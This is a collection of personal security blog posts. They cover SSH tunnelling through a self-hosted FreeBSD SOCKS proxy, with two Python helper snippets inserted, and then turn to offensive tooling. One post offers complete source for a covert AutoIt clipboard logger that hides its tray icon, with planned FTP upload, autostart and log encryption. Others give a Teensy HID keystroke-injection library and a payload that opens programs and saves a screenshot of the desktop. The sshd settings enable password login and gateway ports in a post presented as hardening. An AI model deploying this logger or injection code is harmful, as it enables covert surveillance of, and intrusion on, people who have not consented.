SSH Tunnelling & Secure Browsing: Part III

ssh -D localhost:8080 [username]@[server name]

This time I will go over setting up the SSH client in Linux, setting up key pairs, and how to implement keys for authentication in Linux and in Windows.

Setting up tunnelling in Linux is as easy as typing in:

 


SSH Tunnelling & Secure Browsing: Part II

If you have completed Part I, you should have a running SSH server ready to tunnel all your needs. If you are on a PC running Microsoft's Windows operating system like me, download putty-0.62-installer.exe from http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.62-installer.exe and install it. PuTTY will be our SSH client and we are going to cover:

  1. Password Authentication
  2. Asymmetric Key based authentication (RSA)

The second method is the most secure if implemented properly. Once PuTTY is installed, it should have created an icon on your desktop. Open PuTTY and you will see the screen below:

Default PuTTY Screen

Fill in the fields as necessary:

  • Host Name: [username]@[server name]|[IP address]
  • Port: The default port is 22 ***
  • Connection type: SSH
  • Saved Sessions: [Any name of your liking]

Once this information is filled in, click on "Connection" > expand "SSH" > "Tunnels" and fill in the tunnel information.

Tunnel Configuration

Click Add when done. On the menu to the left, scroll all the way up and click "Session", then click "Save" to save the changes to the configuration. Click "Open" to launch the connection. PuTTY will prompt that the key is not recognized if this is the first time you are connecting. Click Yes to save the key in the registry. I will go over key verification in another post. You will be prompted for your password at this stage; type it to complete the process. Once in, open your browser of choice and change the proxy settings to SOCKSv5 Server / IP = 127.0.0.1, Port: 8090, and you will be tunneling traffic like 1337.
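A quick check that whatever listens on 127.0.0.1:8090 really speaks SOCKS5 before the browser is pointed at it. This is an added example, not part of the original post; the function names are hypothetical, and the host and port are the values given above.

```python
import socket

SOCKS5_VERSION = 0x05
NO_AUTH = 0x00
NO_ACCEPTABLE = 0xFF


def build_greeting(methods=(NO_AUTH,)):
    """RFC 1928 client greeting: VER, NMETHODS, METHODS..."""
    return bytes([SOCKS5_VERSION, len(methods), *methods])


def parse_method_reply(reply):
    """Classify the 2-byte method-selection reply sent by the proxy."""
    if len(reply) != 2:
        return "not-socks5: short reply"
    ver, method = reply
    if ver != SOCKS5_VERSION:
        return "not-socks5: version byte 0x%02x" % ver
    if method == NO_ACCEPTABLE:
        return "socks5: no acceptable auth method"
    if method == NO_AUTH:
        return "socks5: ok (no auth)"
    return "socks5: method 0x%02x selected" % method


def check_proxy(host="127.0.0.1", port=8090, timeout=3.0):
    """Connect to the local forward and report what answers there."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_greeting())
            return parse_method_reply(s.recv(2))
    except OSError as exc:  # nothing listening, timeout, reset
        return "unreachable: %s" % exc


if __name__ == "__main__":
    print(check_proxy())
```

An "unreachable" or "not-socks5" result means the browser would not be going through the tunnel, so fix the PuTTY session before browsing.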

Part III will cover setting up the SSH client in Linux and public/private key based encryption in Linux and Windows. Hope you enjoyed, please comment below.

SSH Tunnelling & Secure Browsing: Part I

Checking your Facebook page from Starbucks? Checked your banking information from the hotel WiFi? Or are you going to Defcon this year?

Public internet is not secure and there is a need for secure browsing. There are many ways to achieve this, obfuscate the traffic for eavesdroppers and protect ourselves against Man In The Middle (MITM) attacks. After trying a few different solutions like the Tor Project, Hotspot Shield and a few others like it, I decided to set up my own SSH server so that I can create a secure tunnel between my laptop and the SSH server and use that as a SOCKSv5 proxy. If you are still interested, I will try to cover the following topics over the next few days:
  1. Install and configure an SSH server (FreeBSD 9.0)
  2. Create users.
  3. Secure and harden the server.
  4. Configure the SSH client (PuTTY) in Windows
  5. Create public and private keys for authentication
  6. Set up password-less login.
I wanted to point out that FreeBSD is really stable, uses very few resources to run, and is my server of choice. I have tested the same with Debian 6.0.4 and it works just as well. All the steps I am about to show should be easy to replicate on all *NIX type systems. I also wanted to point out that a Virtual Private Server will give you the best performance over hosting the SSH server at home.
Server Specs:

Installation Steps:

  1. Create the Guest Machine Guest VM Configuration
  2. Save and power on. The VM should boot from the DVD; press Enter to continue.
  3. Play this video for the actual installation steps

Configuration Steps:

  • Create a new user by typing "adduser" then Enter. P.S. Add the user to the "wheel" group so that the user can invoke "su -"

FreeBSD Account Setup

  • Log in as the newly created user
  • mkdir ~/.ssh
  • chmod 700 .ssh
  • su -
  • Enter root password
  • cp /etc/ssh/sshd_config ~/sshd_config.orig
  • cd /home/n3onli8
  • cp /etc/ssh/sshd_config /home/n3onli8/sshd_config
  • vi sshd_config
  • I configured it to look like:

Protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key

# KeyRegenerationInterval and ServerKeyBits apply to protocol 1 only
KeyRegenerationInterval 1h
ServerKeyBits 1024
LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
PubkeyAuthentication yes
AuthorizedKeysFile    %h/.ssh/authorized_keys
# Change to no to disable built-in password authentication.
PasswordAuthentication yes
PermitEmptyPasswords no
UsePAM no
AllowAgentForwarding yes
AllowTcpForwarding yes
GatewayPorts yes
X11Forwarding yes
X11DisplayOffset 10
X11UseLocalhost yes
PrintLastLog yes
TCPKeepAlive yes
PermitTunnel yes
# override default of no subsystems
Subsystem    sftp    /usr/libexec/sftp-server

  • Write changes and quit
  • rm /etc/ssh/sshd_config
  • mv /home/n3onli8/sshd_config  /etc/ssh/sshd_config
  • /etc/rc.d/sshd restart
  • exit (exit su)

See man sshd_config for a better understanding of sshd_config.
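An added example (not the author's code): a small audit of the configuration above against an assumed policy for a host whose only job is "ssh -D" SOCKS forwarding. SAMPLE is constructed from directives in the post; POLICY and the function names are this example's assumptions.

```python
# Constructed sample: a subset of the directives from the post's sshd_config.
SAMPLE = """\
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
PermitRootLogin no
#StrictModes yes
PasswordAuthentication yes
AllowAgentForwarding yes
AllowTcpForwarding yes
GatewayPorts yes
X11Forwarding yes
PermitTunnel yes
"""

# Assumed policy: directive -> (flagged value, why). AllowTcpForwarding is
# left out on purpose, because "ssh -D" needs it enabled.
POLICY = {
    "passwordauthentication": ("yes", "guessable; move to keys, then set no"),
    "permitrootlogin": ("yes", "root reachable directly over SSH"),
    "gatewayports": ("yes", "remote forwards bind on all interfaces"),
    "x11forwarding": ("yes", "not needed for SOCKS forwarding"),
    "permittunnel": ("yes", "tun(4) tunnels not needed for SOCKS forwarding"),
    "allowagentforwarding": ("yes", "not needed for SOCKS forwarding"),
}

def parse(text):
    """Return ({directive: first value}, [HostKey paths]); '#' lines are skipped."""
    first, hostkeys = {}, []
    for raw in text.splitlines():
        parts = raw.split(None, 1)
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "hostkey":
            hostkeys.append(value)  # HostKey may repeat, one per key type
        first.setdefault(key, value)  # otherwise sshd keeps the first value
    return first, hostkeys

def audit(text):
    """Return sorted (directive, value, reason) findings for one config text."""
    first, hostkeys = parse(text)
    found = [(k, first[k], why) for k, (bad, why) in POLICY.items()
             if first.get(k, "").lower() == bad]
    found += [("hostkey", p, "DSA host key, fixed at 1024 bits")
              for p in hostkeys if "_dsa_" in p.lower()]
    return sorted(found)

if __name__ == "__main__":
    print("\n".join("%s %s: %s" % f for f in audit(SAMPLE)))
```

The commented-out StrictModes line draws no finding because sshd then uses its default of yes, which is also what enforces the chmod 700 on ~/.ssh from the steps above.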

Part II will cover setting up PuTTY in MS Windows

Thanks for reading. Comment below

Autoit: Clipboard Logger

This code will create an executable of approximately 300KB that runs on your computer, logging clipboard data to a text file at %USERPROFILE%\ClipLog.log
  1. Download Autoit from http://www.autoitscript.com/site/
  2. Open SciTE
  3. Copy the code from below and paste it in SciTE
  4. Save the file and hit F5 to test the script
  5. Browse to %USERPROFILE%
  6. Open ClipLog.log to view logged clip board text.
  7. If it's all good then Ctrl + Break to stop the script
  8. Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
  • Copy Log to ftp
  • Auto start program on power on.
  • encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0



#NoTrayIcon
#include <File.au3>
#include <Clipboard.au3>


While 1
    $Clippy = _ClipBoard_GetData()
    If $Clippy <> "0" Then
        If $Clippy <> $txtClipboard Then
            _FileWriteLog(@UserProfileDir & "\ClipLog.log", $Clippy)
        EndIf
    EndIf
    $txtClipboard = $Clippy
    Sleep(100)
WEnd
Exit

Enjoy, Comment below.

<< iPrank >> Teensy ++

Enjoy Demo of n3onli8.h: http://pastebin.com/7dhjJdfN

#include <n3onli8.h>

void AltF(){
   Keyboard.set_modifier(MODIFIERKEY_ALT);
   Keyboard.send_now();
   Keyboard.set_key1(KEY_F);
   Keyboard.send_now();
   delay(200);
   Keyboard.set_modifier(0);
   Keyboard.set_key1(0);
   Keyboard.send_now();
   delay(200);
}

void setup(){
  Serial.begin(9600);
  delay(2500);
  Minimize();
  delay(200);
  PrintScreen();
  delay(200);
  Menu();
  delay(500);
  Keyboard.print("V");
  delay(200);
  Keyboard.print("D");
  delay(200);
  StartRUN();
  delay(500);
  Keyboard.print("mspaint.exe");
  delay(200);
  Enter();
  delay(350);
  Paste();
  delay(200);
  Save();
  delay(200);
  Keyboard.print("%USERPROFILE%\\h4ck.bmp");
  delay(200);
  Enter();
  delay(500);
  AltF();
  delay(100);
  Keyboard.print("K");
  delay(100);
  Keyboard.print("F");
  delay(100);
  AltF4();
  delay(200);
  Minimize(); //Restoring Windows GUI+D
}

void loop(){
}

n3onli8.h Advanced PHUKD Library Complete

Finally completed building the n3onli8.h Teensy library for HID attacks. I wanna call this version 0.1 since I have big plans for this library. Hope you guys enjoy:

/*********************n3onli8.h**************************/

#ifndef N3ONLI8_H_INCLUDED
#define N3ONLI8_H_INCLUDED

#include "WProgram.h"

void CtrlAltDel();
void StartRUN();
void Enter();
void PrintScreen();
void Minimize();
void Menu();
void AltF4();
void Paste();
void Save();

#endif
/*******************************************************/
//http://pastebin.com/haVm6smL

/************************n3onli8.cpp**********************/

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_DELETE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1500);
}

void StartRUN()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    delay(1500);
 
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();  
    Keyboard.set_key1(KEY_BACKSPACE);
    Keyboard.send_now();
    delay(100);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
}

void Enter()
{
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void PrintScreen()
{
    Keyboard.set_key1(KEY_PRINTSCREEN);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void Minimize()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_D);
    Keyboard.send_now();
    delay(300);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Menu()
{
  Mouse.set_buttons(0, 0, 1);
  Mouse.set_buttons(0, 0, 0);
}

void AltF4()
{
    Keyboard.set_modifier(MODIFIERKEY_ALT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_F4);
    Keyboard.send_now();
    delay(200);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Paste(){
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.set_key1(KEY_V);
    Keyboard.send_now();
    delay(200);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Save(){
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.set_key1(KEY_S);
    Keyboard.send_now();
    delay(200);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}
/**********************************************************/
//http://pastebin.com/YKPc6pgK

Save the 2 files in a folder called n3onli8.h and copy the folder into your Arduino\Libraries folder.
Remember >> Great Power Great responsibilities...
Cheers !!!

Other people that deserve my gratitude for HID hacking...

I have been researching online for other people who have been working along the lines of using a teensy or a similar HID device as a penetration testing tool. Check out these fellows:
  • Adrian Crenshaw at irongeek.com, has done some amazing work on the teensy platform. Had I been at Defcon 18, I would have known that he started this project back in 2010. Check out this page for information on his research and the Programmable HID USB Keystroke Dongle (PHUKD) Library.
  • Darren Kitchen from Hak5.org has been working on a project he likes to call the USB Rubber Ducky. Check out their forum to find out more.